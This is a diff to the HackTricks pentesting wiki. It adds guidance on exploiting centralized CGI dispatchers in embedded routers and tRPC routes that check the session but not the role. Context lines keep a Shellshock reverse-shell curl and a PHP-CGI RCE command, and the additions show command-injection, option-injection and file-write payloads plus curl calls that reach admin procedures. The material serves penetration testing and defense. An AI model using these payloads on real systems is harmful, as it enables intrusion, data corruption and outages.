HackTricks-wiki
diff --git a/‎src/linux-hardening/privilege-escalation/README.md‎
Lines changed: 1 addition & 1 deletion b/‎src/linux-hardening/privilege-escalation/README.md‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎src/network-services-pentesting/pentesting-web/cgi.md‎
Lines changed: 36 additions & 4 deletions b/‎src/network-services-pentesting/pentesting-web/cgi.md‎
Lines changed: 36 additions & 4 deletions
diff --git a/‎src/network-services-pentesting/pentesting-web/web-api-pentesting.md‎
Lines changed: 48 additions & 3 deletions b/‎src/network-services-pentesting/pentesting-web/web-api-pentesting.md‎
Lines changed: 48 additions & 3 deletions
@@ -83,7 +83,7 @@ You can check if the sudo version is vulnerable using this grep.
 sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
 ```
 
-#### sudo < v1.28
+#### sudo < v1.8.28
 
 From @sickrov
 
 
@@ -59,11 +59,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt
 > run
 ```
 
-## **Proxy \(MitM to Web server requests\)**
+## Centralized CGI dispatchers (single endpoint routing via selector parameters)
 
-CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"
+Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (for example, `/cgi-bin/cstecgi.cgi`) and use a selector parameter such as `topicurl=<handler>` to route the request to an internal function.
 
-As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" and if the server performs any request during the session. You will be able to capture each request made by the server.
+Methodology to exploit these routers:
+
+- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher.
+- Test unauthenticated reachability: some handlers forget auth checks and are directly callable.
+- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`.
+
+Generic exploit shapes:
+
+```http
+POST /cgi-bin/cstecgi.cgi HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+
+# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools
+topicurl=<handler>&param=-n
+
+# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell
+topicurl=setEasyMeshAgentCfg&agentName=;id;
+
+# 3) Validator bypass → arbitrary file write in file-touching handlers
+topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc
+```
+
+Detection and hardening:
+
+- Watch for unauthenticated requests to centralized CGI endpoints with `topicurl` set to sensitive handlers.
+- Flag parameters that begin with `-` (argv option injection attempts).
+- Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags.
 
 ## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
 
@@ -80,8 +106,14 @@ curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:500
 
 **More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
 
+## **Proxy \(MitM to Web server requests\)**
 
-{{#include ../../banners/hacktricks-training.md}}
+CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"
+
+As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" and if the server performs any request during the session. You will be able to capture each request made by the server.
 
+## **References**
 
+- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 
+{{#include ../../banners/hacktricks-training.md}}
@@ -28,6 +28,53 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th
 - **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing.
 - **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions.
 
+### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls
+
+Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`.
+
+- Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control).
+- Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability.
+- Typical tRPC route shape (v10+): JSON body wrapped under `{"input": {...}}`.
+
+Example vulnerable pattern (no role/permission gate):
+
+```ts
+// The endpoint for retrying a migration job
+// This checks for a valid session (authentication)
+retry: protectedProcedure
+  // but not for an admin role (authorization).
+  .input(z.object({ name: z.string() }))
+  .mutation(async ({ input, ctx }) => {
+    // Logic to restart a sensitive migration
+  }),
+```
+
+Practical exploitation (black-box)
+
+1) Register a normal account and obtain an authenticated session (cookies/headers).
+2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures.
+
+```bash
+curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \
+  -H 'Content-Type: application/json' \
+  -b '<AUTH_COOKIES>' \
+  --data '{"input":{}}'
+```
+
+3) Invoke privileged actions such as restarting a job:
+
+```bash
+curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \
+  -H 'Content-Type: application/json' \
+  -b '<AUTH_COOKIES>' \
+  --data '{"input":{"name":"<migration_name>"}}'
+```
+
+Impact to assess
+
+- Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics).
+- DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages.
+
 ### **Tools and Resources for API Pentesting**
 
 - [**kiterunner**](https://github.com/assetnote/kiterunner): Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs.
@@ -53,8 +100,6 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 ## References
 
 - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
+- [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-